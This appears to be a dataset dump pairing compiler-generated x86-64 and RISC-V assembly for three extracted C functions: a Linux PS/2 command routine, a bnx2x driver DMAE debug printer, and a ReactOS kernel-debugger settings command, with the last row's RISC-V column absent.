name
stringlengths
21
115
x86_asm
stringlengths
324
67k
riscv_asm
stringlengths
159
53.2k
extr_libps2.c___ps2_command_aug_v3_2
.file "extr_libps2.c___ps2_command_aug_v3_2.c" .text .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC0: .string "%02x [%*ph] - %x/%08lx [%*ph]\n" .text .p2align 4 .globl __ps2_command .type __ps2_command, @function __ps2_command: .LFB0: .cfi_startproc endbr64 pushq %r15 .cfi_def_cfa_offset 16 .cfi_offset 15, -16 pushq %r14 .cfi_def_cfa_offset 24 .cfi_offset 14, -24 pushq %r13 .cfi_def_cfa_offset 32 .cfi_offset 13, -32 pushq %r12 .cfi_def_cfa_offset 40 .cfi_offset 12, -40 pushq %rbp .cfi_def_cfa_offset 48 .cfi_offset 6, -48 movl %edx, %ebp pushq %rbx .cfi_def_cfa_offset 56 .cfi_offset 3, -56 shrl $8, %ebp andl $15, %ebp subq $104, %rsp .cfi_def_cfa_offset 160 movq %fs:40, %rax movq %rax, 88(%rsp) movl %edx, %eax shrl $12, %eax andl $15, %eax cmpl $8, %ebp ja .L4 testl %eax, %eax jne .L4 movq %rsi, %r12 testq %rsi, %rsi je .L4 leaq 16(%rsp), %r13 movq %rdi, %rbx movl %edx, %r15d xorl %edx, %edx movq %r13, %rdi call memcpy@PLT movq 24(%rbx), %rdi call serio_pause_rx@PLT xorl %eax, %eax cmpl %r15d, PS2_CMD_GETID(%rip) je .L32 movl %eax, (%rbx) movl %ebp, 4(%rbx) testl %ebp, %ebp je .L6 .L37: movq 8(%rbx), %rdi leal -1(%rbp), %eax movq %r12, %rdx .p2align 4,,10 .p2align 3 .L7: movl (%rdx), %esi movl %eax, %ecx subl $1, %eax addq $4, %rdx movl %esi, (%rdi,%rcx,4) cmpl $-1, %eax jne .L7 movl (%rbx), %eax .L6: orl PS2_FLAG_ACK_CMD(%rip), %eax movl $1000, %edx movzbl %r15b, %r14d movq %rbx, %rdi movl %eax, (%rbx) movl $200, %eax movl $2, %ecx movl %r14d, %esi cmpl %r15d, PS2_CMD_RESET_BAT(%rip) cmovne %eax, %edx call ps2_do_sendbyte@PLT movl %eax, %r10d testl %eax, %eax je .L33 .L9: movl $0, (%rbx) movq 24(%rbx), %rdi movl %r10d, 12(%rsp) call serio_continue_rx@PLT subq $8, %rsp .cfi_def_cfa_offset 168 movq 24(%rbx), %rdi xorl %ecx, %ecx pushq %r12 .cfi_def_cfa_offset 176 movq %r13, %r8 movl %r14d, %edx leaq .LC0(%rip), %rsi pushq %rbp .cfi_def_cfa_offset 184 movl (%rbx), %eax pushq %rax .cfi_def_cfa_offset 192 movl 16(%rbx), %r9d call dev_dbg@PLT movl 44(%rsp), %r10d addq $32, %rsp .cfi_def_cfa_offset 160 movl %r10d, %eax addl EAGAIN(%rip), %eax je .L34 .L1: movq 88(%rsp), %rax subq %fs:40, %rax jne .L35 addq $104, %rsp .cfi_remember_state .cfi_def_cfa_offset 56 movl %r10d, %eax popq %rbx .cfi_def_cfa_offset 48 popq %rbp .cfi_def_cfa_offset 40 popq %r12 .cfi_def_cfa_offset 32 popq %r13 .cfi_def_cfa_offset 24 popq %r14 .cfi_def_cfa_offset 16 popq %r15 .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L33: .cfi_restore_state movl %eax, 12(%rsp) movl PS2_FLAG_ACK_CMD(%rip), %eax movq 24(%rbx), %rdi notl %eax andl %eax, (%rbx) call serio_continue_rx@PLT movl $500, %eax movl $4000, %edi cmpl %r15d, PS2_CMD_RESET_BAT(%rip) cmovne %eax, %edi call msecs_to_jiffies@PLT xorl %esi, %esi movl 32(%rbx), %edi movl %eax, %edx movl (%rbx), %eax andl PS2_FLAG_CMD1(%rip), %eax sete %sil call wait_event_timeout@PLT movl 4(%rbx), %edx movl 12(%rsp), %r10d testl %edx, %edx jne .L36 .L11: movq 24(%rbx), %rdi movl %r10d, 12(%rsp) call serio_pause_rx@PLT testl %ebp, %ebp movl 12(%rsp), %r10d je .L15 movq 8(%rbx), %rsi leal -1(%rbp), %eax movq %r12, %rdx .p2align 4,,10 .p2align 3 .L14: movl %eax, %ecx subl $1, %eax addq $4, %rdx movl (%rsi,%rcx,4), %ecx movl %ecx, -4(%rdx) cmpl $-1, %eax jne .L14 .L15: movl 4(%rbx), %eax testl %eax, %eax je .L9 cmpl %r15d, PS2_CMD_RESET_BAT(%rip) jne .L21 cmpl $1, %eax je .L9 .L21: movl EPROTO(%rip), %r10d negl %r10d jmp .L9 .p2align 4,,10 .p2align 3 .L4: movl $1, %edi call WARN_ON@PLT movl EINVAL(%rip), %r10d negl %r10d jmp .L1 .p2align 4,,10 .p2align 3 .L32: movl PS2_FLAG_WAITID(%rip), %eax movl %ebp, 4(%rbx) movl %eax, (%rbx) testl %ebp, %ebp je .L6 jmp .L37 .p2align 4,,10 .p2align 3 .L34: movl EPROTO(%rip), %r10d negl %r10d jmp .L1 .p2align 4,,10 .p2align 3 .L36: movl (%rbx), %edx andl PS2_FLAG_CMD1(%rip), %edx jne .L11 movl %eax, %edx movl %r15d, %esi movq %rbx, %rdi call ps2_adjust_timeout@PLT xorl %esi, %esi movl 32(%rbx), %edi movl %eax, %edx movl (%rbx), %eax andl PS2_FLAG_CMD(%rip), %eax sete %sil call wait_event_timeout@PLT movl 12(%rsp), %r10d jmp .L11 .L35: call __stack_chk_fail@PLT .cfi_endproc .LFE0: .size __ps2_command, .-__ps2_command .globl PS2_FLAG_WAITID .bss .align 4 .type PS2_FLAG_WAITID, @object .size PS2_FLAG_WAITID, 4 PS2_FLAG_WAITID: .zero 4 .globl PS2_FLAG_CMD1 .align 4 .type PS2_FLAG_CMD1, @object .size PS2_FLAG_CMD1, 4 PS2_FLAG_CMD1: .zero 4 .globl PS2_FLAG_CMD .align 4 .type PS2_FLAG_CMD, @object .size PS2_FLAG_CMD, 4 PS2_FLAG_CMD: .zero 4 .globl PS2_FLAG_ACK_CMD .align 4 .type PS2_FLAG_ACK_CMD, @object .size PS2_FLAG_ACK_CMD, 4 PS2_FLAG_ACK_CMD: .zero 4 .globl PS2_CMD_RESET_BAT .align 4 .type PS2_CMD_RESET_BAT, @object .size PS2_CMD_RESET_BAT, 4 PS2_CMD_RESET_BAT: .zero 4 .globl PS2_CMD_GETID .align 4 .type PS2_CMD_GETID, @object .size PS2_CMD_GETID, 4 PS2_CMD_GETID: .zero 4 .globl EPROTO .align 4 .type EPROTO, @object .size EPROTO, 4 EPROTO: .zero 4 .globl EINVAL .align 4 .type EINVAL, @object .size EINVAL, 4 EINVAL: .zero 4 .globl EAGAIN .align 4 .type EAGAIN, @object .size EAGAIN, 4 EAGAIN: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_libps2.c___ps2_command_aug_v3_2.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "%02x [%*ph] - %x/%08lx [%*ph]\n" .text .align 1 .globl __ps2_command .type __ps2_command, @function __ps2_command: addi sp,sp,-176 sd s4,128(sp) la s4,__stack_chk_guard sd s6,112(sp) ld a4, 0(s4) sd a4, 88(sp) li a4, 0 srliw s6,a2,8 sd ra,168(sp) sd s0,160(sp) sd s1,152(sp) sd s2,144(sp) sd s3,136(sp) sd s5,120(sp) sd s7,104(sp) sd s8,96(sp) andi s6,s6,15 li a4,8 bgtu s6,a4,.L4 srliw a5,a2,12 andi a5,a5,15 bne a5,zero,.L4 mv s2,a1 beq a1,zero,.L4 addi s5,sp,24 mv s0,a0 mv s1,a2 mv a0,s5 li a2,0 call memcpy@plt ld a0,24(s0) lla s3,.LANCHOR0 call serio_pause_rx@plt lw a4,4(s3) li a5,0 bne a4,s1,.L5 lw a5,8(s3) .L5: sw a5,0(s0) sw s6,4(s0) beq s6,zero,.L6 ld a0,8(s0) addiw a5,s6,-1 mv a3,s2 li a1,-1 .L7: lw a2,0(a3) slli a6,a5,32 srli a4,a6,30 add a4,a0,a4 sw a2,0(a4) addiw a5,a5,-1 addi a3,a3,4 bne a5,a1,.L7 lw a5,0(s0) .L6: lw a3,12(s3) lw a4,16(s3) li a2,1000 or a5,a5,a3 sw a5,0(s0) beq a4,s1,.L8 li a2,200 .L8: andi s8,s1,0xff li a3,2 mv a1,s8 mv a0,s0 call ps2_do_sendbyte@plt mv s7,a0 bne a0,zero,.L9 lw a5,12(s3) lw a4,0(s0) ld a0,24(s0) not a5,a5 and a5,a5,a4 sw a5,0(s0) call serio_continue_rx@plt lw a5,16(s3) li a0,500 beq a5,s1,.L34 .L10: call msecs_to_jiffies@plt lw a5,20(s3) lw a1,0(s0) mv a2,a0 lw a0,32(s0) and a1,a1,a5 sext.w a2,a2 seqz a1,a1 call wait_event_timeout@plt lw a5,4(s0) sext.w a2,a0 beq a5,zero,.L11 lw a5,0(s0) lw a4,20(s3) and a5,a5,a4 beq a5,zero,.L35 .L11: ld a0,24(s0) call serio_pause_rx@plt beq s6,zero,.L15 ld a1,8(s0) addiw a5,s6,-1 mv a3,s2 li a2,-1 .L14: slli a0,a5,32 srli a4,a0,30 add a4,a1,a4 lw a4,0(a4) addiw a5,a5,-1 addi a3,a3,4 sw a4,-4(a3) bne a5,a2,.L14 .L15: lw a5,4(s0) beq a5,zero,.L9 lw a4,16(s3) bne a4,s1,.L16 li a4,1 beq a5,a4,.L9 .L16: lw s7,28(s3) negw s7,s7 .L9: ld a0,24(s0) sw zero,0(s0) call serio_continue_rx@plt lw a5,16(s0) lw a6,0(s0) ld a0,24(s0) mv a7,s6 sd s2,0(sp) mv a4,s5 li a3,0 mv a2,s8 lla a1,.LC0 call dev_dbg@plt lw a5,32(s3) negw a5,a5 bne a5,s7,.L3 lw s7,28(s3) negw s7,s7 j .L3 .L4: li a0,1 call WARN_ON@plt lw s7,.LANCHOR0 negw s7,s7 .L3: ld a4, 88(sp) ld a5, 0(s4) xor a5, a4, a5 li a4, 0 bne a5,zero,.L36 ld ra,168(sp) ld s0,160(sp) ld s1,152(sp) ld s2,144(sp) ld s3,136(sp) ld s4,128(sp) ld s5,120(sp) ld s6,112(sp) ld s8,96(sp) mv a0,s7 ld s7,104(sp) addi sp,sp,176 jr ra .L34: li a0,4096 addi a0,a0,-96 j .L10 .L35: mv a1,s1 mv a0,s0 call ps2_adjust_timeout@plt lw a1,0(s0) lw a5,24(s3) mv a2,a0 lw a0,32(s0) and a1,a1,a5 sext.w a2,a2 seqz a1,a1 call wait_event_timeout@plt j .L11 .L36: call __stack_chk_fail@plt .size __ps2_command, .-__ps2_command .globl PS2_FLAG_WAITID .globl PS2_FLAG_CMD1 .globl PS2_FLAG_CMD .globl PS2_FLAG_ACK_CMD .globl PS2_CMD_RESET_BAT .globl PS2_CMD_GETID .globl EPROTO .globl EINVAL .globl EAGAIN .bss .align 2 .set .LANCHOR0,. + 0 .type EINVAL, @object .size EINVAL, 4 EINVAL: .zero 4 .type PS2_CMD_GETID, @object .size PS2_CMD_GETID, 4 PS2_CMD_GETID: .zero 4 .type PS2_FLAG_WAITID, @object .size PS2_FLAG_WAITID, 4 PS2_FLAG_WAITID: .zero 4 .type PS2_FLAG_ACK_CMD, @object .size PS2_FLAG_ACK_CMD, 4 PS2_FLAG_ACK_CMD: .zero 4 .type PS2_CMD_RESET_BAT, @object .size PS2_CMD_RESET_BAT, 4 PS2_CMD_RESET_BAT: .zero 4 .type PS2_FLAG_CMD1, @object .size PS2_FLAG_CMD1, 4 PS2_FLAG_CMD1: .zero 4 .type PS2_FLAG_CMD, @object .size PS2_FLAG_CMD, 4 PS2_FLAG_CMD: .zero 4 .type EPROTO, @object .size EPROTO, 4 EPROTO: .zero 4 .type EAGAIN, @object .size EAGAIN, 4 EAGAIN: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_bnx2x_main.c_bnx2x_dp_dmae_aug_v3_7
.file "extr_bnx2x_main.c_bnx2x_dp_dmae_aug_v3_7.c" .text .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC0: .string "DMAE: opcode 0x%08x\nsrc [%x:%08x], len [%d*4], dst [%x:%08x]\ncomp_addr [%x:%08x], comp_val 0x%08x\n" .align 8 .LC1: .string "DMAE: opcode 0x%08x\nsrc [%08x], len [%d*4], dst [%x:%08x]\ncomp_addr [%x:%08x], comp_val 0x%08x\n" .align 8 .LC2: .string "DMAE: opcode 0x%08x\nsrc [%x:%08x], len [%d*4], dst_addr [%08x]\ncomp_addr [%x:%08x], comp_val 0x%08x\n" .align 8 .LC3: .string "DMAE: opcode 0x%08x\nsrc [%08x], len [%d*4], dst [%08x]\ncomp_addr [%x:%08x], comp_val 0x%08x\n" .section .rodata.str1.1,"aMS",@progbits,1 .LC4: .string "DMAE RAW [%02d]: 0x%08x\n" .section .rodata.str1.8 .align 8 .LC5: .string "DMAE: opcode 0x%08x\nsrc_addr [%x:%08x] len [%d * 4] dst_addr [none]\ncomp_addr [%x:%08x] comp_val 0x%08x\n" .align 8 .LC6: .string "DMAE: opcode 0x%08x\nsrc_addr [%08x] len [%d * 4] dst_addr [none]\ncomp_addr [%x:%08x] comp_val 0x%08x\n" .text .p2align 4 .type bnx2x_dp_dmae, @function bnx2x_dp_dmae: .LFB0: .cfi_startproc endbr64 movl DMAE_COMMAND_DST(%rip), %eax movl DMAE_CMD_SRC_PCI(%rip), %r11d pushq %r12 .cfi_def_cfa_offset 16 .cfi_offset 12, -16 pushq %rbp .cfi_def_cfa_offset 24 .cfi_offset 6, -24 movl %edx, %ebp movl DMAE_COMMAND_SRC(%rip), %r12d pushq %rbx .cfi_def_cfa_offset 32 .cfi_offset 3, -32 movl (%rsi), %edx movq %rsi, %rbx movl 12(%rsi), %r10d movl 16(%rsi), %edi andl %edx, %eax movl 20(%rsi), %esi movl 24(%rbx), %r8d andl %edx, %r12d movl 4(%rbx), %ecx cmpl $128, %eax je .L2 cmpl $129, %eax je .L3 cmpl %r11d, %r12d je .L12 pushq %r10 .cfi_def_cfa_offset 40 movl %esi, %r9d sarl $2, %ecx leaq .LC6(%rip), %rsi pushq %rdi .cfi_def_cfa_offset 48 xorl %eax, %eax movl %ebp, %edi call DP@PLT popq %rax .cfi_def_cfa_offset 40 popq %rdx .cfi_def_cfa_offset 32 .L6: movl (%rbx), %ecx movl %ebp, %edi popq %rbx .cfi_remember_state .cfi_def_cfa_offset 24 xorl %edx, %edx popq %rbp .cfi_def_cfa_offset 16 leaq .LC4(%rip), %rsi xorl %eax, %eax popq %r12 .cfi_def_cfa_offset 8 jmp DP@PLT .p2align 4,,10 .p2align 3 .L2: .cfi_restore_state movl 32(%rbx), %r9d movl 8(%rbx), %eax cmpl %r11d, %r12d je .L13 pushq %r10 .cfi_def_cfa_offset 40 sarl $2, %ecx pushq %rdi .cfi_def_cfa_offset 48 movl %ebp, %edi pushq %rsi .cfi_def_cfa_offset 56 leaq .LC1(%rip), %rsi pushq %rax .cfi_def_cfa_offset 64 xorl %eax, %eax call DP@PLT addq $32, %rsp .cfi_def_cfa_offset 32 jmp .L6 .p2align 4,,10 .p2align 3 .L3: movl 8(%rbx), %r9d sarl $2, %r9d cmpl %r11d, %r12d je .L14 subq $8, %rsp .cfi_def_cfa_offset 40 sarl $2, %ecx xorl %eax, %eax pushq %r10 .cfi_def_cfa_offset 48 pushq %rdi .cfi_def_cfa_offset 56 movl %ebp, %edi pushq %rsi .cfi_def_cfa_offset 64 leaq .LC3(%rip), %rsi call DP@PLT addq $32, %rsp .cfi_def_cfa_offset 32 jmp .L6 .p2align 4,,10 .p2align 3 .L12: subq $8, %rsp .cfi_def_cfa_offset 40 movl 28(%rbx), %r11d movl %r8d, %r9d xorl %eax, %eax pushq %r10 .cfi_def_cfa_offset 48 movl %ecx, %r8d pushq %rdi .cfi_def_cfa_offset 56 movl %r11d, %ecx movl %ebp, %edi pushq %rsi .cfi_def_cfa_offset 64 leaq .LC5(%rip), %rsi call DP@PLT addq $32, %rsp .cfi_def_cfa_offset 32 jmp .L6 .p2align 4,,10 .p2align 3 .L14: pushq %r10 .cfi_def_cfa_offset 40 movl 28(%rbx), %r11d xorl %eax, %eax pushq %rdi .cfi_def_cfa_offset 48 movl %ebp, %edi pushq %rsi .cfi_def_cfa_offset 56 leaq .LC2(%rip), %rsi pushq %r9 .cfi_def_cfa_offset 64 movl %r8d, %r9d movl %ecx, %r8d movl %r11d, %ecx call DP@PLT addq $32, %rsp .cfi_def_cfa_offset 32 jmp .L6 .p2align 4,,10 .p2align 3 .L13: subq $8, %rsp .cfi_def_cfa_offset 40 movl 28(%rbx), %r11d pushq %r10 .cfi_def_cfa_offset 48 pushq %rdi .cfi_def_cfa_offset 56 movl %ebp, %edi pushq %rsi .cfi_def_cfa_offset 64 leaq .LC0(%rip), %rsi pushq %rax .cfi_def_cfa_offset 72 xorl %eax, %eax pushq %r9 .cfi_def_cfa_offset 80 movl %r8d, %r9d movl %ecx, %r8d movl %r11d, %ecx call DP@PLT addq $48, %rsp .cfi_def_cfa_offset 32 jmp .L6 .cfi_endproc .LFE0: .size bnx2x_dp_dmae, .-bnx2x_dp_dmae .globl DMAE_COMMAND_SRC .bss .align 4 .type DMAE_COMMAND_SRC, @object .size DMAE_COMMAND_SRC, 4 DMAE_COMMAND_SRC: .zero 4 .globl DMAE_COMMAND_DST .align 4 .type DMAE_COMMAND_DST, @object .size DMAE_COMMAND_DST, 4 DMAE_COMMAND_DST: .zero 4 .globl DMAE_CMD_SRC_PCI .align 4 .type DMAE_CMD_SRC_PCI, @object .size DMAE_CMD_SRC_PCI, 4 DMAE_CMD_SRC_PCI: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_bnx2x_main.c_bnx2x_dp_dmae_aug_v3_7.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "DMAE: opcode 0x%08x\nsrc [%x:%08x], len [%d*4], dst [%x:%08x]\ncomp_addr [%x:%08x], comp_val 0x%08x\n" .align 3 .LC1: .string "DMAE: opcode 0x%08x\nsrc [%08x], len [%d*4], dst [%x:%08x]\ncomp_addr [%x:%08x], comp_val 0x%08x\n" .align 3 .LC2: .string "DMAE: opcode 0x%08x\nsrc [%x:%08x], len [%d*4], dst_addr [%08x]\ncomp_addr [%x:%08x], comp_val 0x%08x\n" .align 3 .LC3: .string "DMAE: opcode 0x%08x\nsrc [%08x], len [%d*4], dst [%08x]\ncomp_addr [%x:%08x], comp_val 0x%08x\n" .align 3 .LC4: .string "DMAE RAW [%02d]: 0x%08x\n" .align 3 .LC5: .string "DMAE: opcode 0x%08x\nsrc_addr [%x:%08x] len [%d * 4] dst_addr [none]\ncomp_addr [%x:%08x] comp_val 0x%08x\n" .align 3 .LC6: .string "DMAE: opcode 0x%08x\nsrc_addr [%08x] len [%d * 4] dst_addr [none]\ncomp_addr [%x:%08x] comp_val 0x%08x\n" .text .align 1 .type bnx2x_dp_dmae, @function bnx2x_dp_dmae: addi sp,sp,-64 lla a5,.LANCHOR0 lw a3,4(a5) sd s0,48(sp) mv s0,a1 lw a1,0(a1) lw a0,0(a5) sd s1,40(sp) sd ra,56(sp) and a3,a1,a3 li t1,128 lw t6,8(a5) lw t3,4(s0) lw a4,24(s0) lw t4,20(s0) lw t5,16(s0) lw a7,12(s0) mv s1,a2 and a0,a1,a0 beq a3,t1,.L2 li a2,129 beq a3,a2,.L3 beq a0,t6,.L12 mv a2,a1 mv a6,t5 mv a5,t4 srai a3,t3,2 lla a1,.LC6 mv a0,s1 call DP@plt .L6: lw a3,0(s0) ld s0,48(sp) ld ra,56(sp) mv a0,s1 ld s1,40(sp) li a2,0 lla a1,.LC4 addi sp,sp,64 tail DP@plt .L2: lw a5,32(s0) lw a6,8(s0) beq a0,t6,.L13 sd a7,8(sp) mv a2,a1 sd t5,0(sp) mv a7,t4 srai a3,t3,2 lla a1,.LC1 mv a0,s1 call DP@plt j .L6 .L3: lw a5,8(s0) srai a5,a5,2 beq a0,t6,.L14 sd a7,0(sp) mv a2,a1 mv a7,t5 mv a6,t4 srai a3,t3,2 lla a1,.LC3 mv a0,s1 call DP@plt j .L6 .L12: lw a3,28(s0) mv a5,a4 sd a7,0(sp) mv a2,a1 mv a7,t5 mv a6,t4 mv a4,t3 lla a1,.LC5 mv a0,s1 call DP@plt j .L6 .L14: lw a3,28(s0) mv a6,a5 sd a7,8(sp) mv a5,a4 mv a2,a1 sd t5,0(sp) mv a7,t4 mv a4,t3 lla a1,.LC2 mv a0,s1 call DP@plt j .L6 .L13: lw a3,28(s0) mv a2,a1 sd a7,16(sp) sd t5,8(sp) mv a7,a6 sd t4,0(sp) mv a6,a5 lla a1,.LC0 mv a5,a4 mv a0,s1 mv a4,t3 call DP@plt j .L6 .size bnx2x_dp_dmae, .-bnx2x_dp_dmae .globl DMAE_COMMAND_SRC .globl DMAE_COMMAND_DST .globl DMAE_CMD_SRC_PCI .bss .align 2 .set .LANCHOR0,. + 0 .type DMAE_COMMAND_SRC, @object .size DMAE_COMMAND_SRC, 4 DMAE_COMMAND_SRC: .zero 4 .type DMAE_COMMAND_DST, @object .size DMAE_COMMAND_DST, 4 DMAE_COMMAND_DST: .zero 4 .type DMAE_CMD_SRC_PCI, @object .size DMAE_CMD_SRC_PCI, 4 DMAE_CMD_SRC_PCI: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_kdb_cli.c_KdbpCmdSet_aug_v3_5
.file "extr_kdb_cli.c_KdbpCmdSet_aug_v3_5.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "Available settings:\n" .LC1: .string " syntax [intel|at&t]\n" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC2: .string " condition [exception|*] [first|last] [never|always|kmode|umode]\n" .align 8 .LC3: .string " break_on_module_load [true|false]\n" .section .rodata.str1.1 .LC4: .string "syntax" .LC5: .string "condition" .LC6: .string "*" .LC7: .string "Unknown exception '%s'.\n" .section .rodata.str1.8 .align 8 .LC8: .string "Condition for exception #%02d (%s): FirstChance %s LastChance %s\n" .align 8 .LC9: .string "Condition for all other exceptions: FirstChance %s LastChance %s\n" .section .rodata.str1.1 .LC10: .string "break_on_module_load" .LC11: .string "Unknown setting '%s'.\n" .text .p2align 4 .type KdbpCmdSet, @function KdbpCmdSet: .LFB25: .cfi_startproc endbr64 pushq %r13 .cfi_def_cfa_offset 16 .cfi_offset 13, -16 pushq %r12 .cfi_def_cfa_offset 24 .cfi_offset 12, -24 pushq %rbp .cfi_def_cfa_offset 32 .cfi_offset 6, -32 pushq %rbx .cfi_def_cfa_offset 40 .cfi_offset 3, -40 subq $40, %rsp .cfi_def_cfa_offset 80 movq %fs:40, %rax movq %rax, 24(%rsp) xorl %eax, %eax movl KdbDoNotEnter(%rip), %eax movq $0, 16(%rsp) movl %eax, 8(%rsp) movl %eax, 12(%rsp) cmpl $1, %edi je .L2 leaq .LC0(%rip), %rdi xorl %eax, %eax call KdbpPrint@PLT leaq .LC1(%rip), %rdi xorl %eax, %eax call KdbpPrint@PLT leaq .LC2(%rip), %rdi xorl %eax, %eax call KdbpPrint@PLT leaq .LC3(%rip), %rdi xorl %eax, %eax call KdbpPrint@PLT .L3: movl TRUE(%rip), %eax .L1: movq 24(%rsp), %rdx subq %fs:40, %rdx jne .L27 addq $40, %rsp .cfi_remember_state .cfi_def_cfa_offset 40 popq %rbx .cfi_def_cfa_offset 32 popq %rbp .cfi_def_cfa_offset 24 popq %r12 .cfi_def_cfa_offset 16 popq %r13 .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L2: .cfi_restore_state movq 8(%rsi), %rdi movq %rsi, %rbx leaq .LC4(%rip), %rsi call strcmp@PLT testq %rax, %rax je .L3 movq 8(%rbx), %rdi leaq .LC5(%rip), %rsi call strcmp@PLT testq %rax, %rax jne .L5 movq 16(%rbx), %rdi leaq .LC6(%rip), %rsi call strcmp@PLT testq %rax, %rax je .L17 movq 16(%rbx), %rdi leaq 16(%rsp), %rsi xorl %edx, %edx leaq ExceptionNames.0(%rip), %r13 call strtoul@PLT movl %eax, %ebp movq 16(%rsp), %rax cmpq %rax, 16(%rbx) je .L28 .L8: movq %r13, %rdi call RTL_NUMBER_OF@PLT cmpl %ebp, %eax jle .L29 .L6: movl TRUE(%rip), %esi leaq 8(%rsp), %rdx movl %ebp, %edi call KdbpGetEnterCondition@PLT testl %eax, %eax je .L30 .L12: movl FALSE(%rip), %esi leaq 12(%rsp), %rdx movl %ebp, %edi call KdbpGetEnterCondition@PLT testl %eax, %eax je .L31 .L13: movq %r13, %rdi call RTL_NUMBER_OF@PLT movl 12(%rsp), %edi subl $1, %eax cmpl %ebp, %eax jle .L14 call KDB_ENTER_CONDITION_TO_STRING@PLT movl 8(%rsp), %edi movl %eax, %ebx call KDB_ENTER_CONDITION_TO_STRING@PLT movl %ebx, %r8d movl %ebp, %esi leaq .LC8(%rip), %rdi movl %eax, %ecx movslq %ebp, %rax movq 0(%r13,%rax,8), %rdx xorl %eax, %eax call KdbpPrint@PLT jmp .L3 .p2align 4,,10 .p2align 3 .L5: movq 8(%rbx), %rdi leaq .LC10(%rip), %rsi call strcmp@PLT testq %rax, %rax je .L3 movq 8(%rbx), %rsi leaq .LC11(%rip), %rdi xorl %eax, %eax call KdbpPrint@PLT jmp .L3 .p2align 4,,10 .p2align 3 .L17: movl $-1, %ebp leaq ExceptionNames.0(%rip), %r13 jmp .L6 .p2align 4,,10 .p2align 3 .L14: call KDB_ENTER_CONDITION_TO_STRING@PLT movl 8(%rsp), %edi movl %eax, %r12d call KDB_ENTER_CONDITION_TO_STRING@PLT movl %r12d, %edx leaq .LC9(%rip), %rdi movl %eax, %esi xorl %eax, %eax call KdbpPrint@PLT jmp .L3 .p2align 4,,10 .p2align 3 .L31: movl FALSE(%rip), %edi call ASSERT@PLT jmp .L13 .p2align 4,,10 .p2align 3 .L30: movl FALSE(%rip), %edi call ASSERT@PLT jmp .L12 .L28: xorl %r12d, %r12d leaq ExceptionNames.0(%rip), %r13 jmp .L7 .p2align 4,,10 .p2align 3 .L10: movq 0(%r13,%r12,8), %rdi testq %rdi, %rdi je .L9 movq 16(%rbx), %rsi call _stricmp@PLT .L9: addq $1, %r12 .L7: movq %r13, %rdi movl %r12d, %ebp call RTL_NUMBER_OF@PLT cmpl %r12d, %eax jg .L10 jmp .L8 .L29: movq 16(%rbx), %rsi leaq .LC7(%rip), %rdi xorl %eax, %eax call KdbpPrint@PLT movl TRUE(%rip), %eax jmp .L1 .L27: call __stack_chk_fail@PLT .cfi_endproc .LFE25: .size KdbpCmdSet, .-KdbpCmdSet .section .rodata.str1.1 .LC12: .string "ZERODEVIDE" .LC13: .string "DEBUGTRAP" .LC14: .string "NMI" .LC15: .string "INT3" .LC16: .string "OVERFLOW" .LC17: .string "BOUND" .LC18: .string "INVALIDOP" .LC19: .string "NOMATHCOP" .LC20: .string "DOUBLEFAULT" .LC21: .string "RESERVED(9)" .LC22: .string "INVALIDTSS" .LC23: .string "SEGMENTNOTPRESENT" .LC24: .string "STACKFAULT" .LC25: .string "GPF" .LC26: .string "PAGEFAULT" .LC27: .string "RESERVED(15)" .LC28: .string "MATHFAULT" .LC29: .string "ALIGNMENTCHECK" .LC30: .string "MACHINECHECK" .LC31: .string "SIMDFAULT" .LC32: .string "OTHERS" .section .data.rel.ro.local,"aw" .align 32 .type ExceptionNames.0, @object .size ExceptionNames.0, 168 ExceptionNames.0: .quad .LC12 .quad .LC13 .quad .LC14 .quad .LC15 .quad .LC16 .quad .LC17 .quad .LC18 .quad .LC19 .quad .LC20 .quad .LC21 .quad .LC22 .quad .LC23 .quad .LC24 .quad .LC25 .quad .LC26 .quad .LC27 .quad .LC28 .quad .LC29 .quad .LC30 .quad .LC31 .quad .LC32 .globl TRUE .bss .align 4 .type TRUE, @object .size TRUE, 4 TRUE: .zero 4 .globl KdbUseIntelSyntax .align 4 .type KdbUseIntelSyntax, @object .size KdbUseIntelSyntax, 4 KdbUseIntelSyntax: .zero 4 .globl KdbEnterFromUmode .align 4 .type KdbEnterFromUmode, @object .size KdbEnterFromUmode, 4 KdbEnterFromUmode: .zero 4 .globl KdbEnterFromKmode .align 4 .type KdbEnterFromKmode, @object .size KdbEnterFromKmode, 4 KdbEnterFromKmode: .zero 4 .globl KdbEnterAlways .align 4 .type KdbEnterAlways, @object .size KdbEnterAlways, 4 KdbEnterAlways: .zero 4 .globl KdbDoNotEnter .align 4 .type KdbDoNotEnter, @object .size KdbDoNotEnter, 4 KdbDoNotEnter: .zero 4 .globl KdbBreakOnModuleLoad .align 4 .type KdbBreakOnModuleLoad, @object .size KdbBreakOnModuleLoad, 4 KdbBreakOnModuleLoad: .zero 4 .globl FALSE .align 4 .type FALSE, @object .size FALSE, 4 FALSE: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
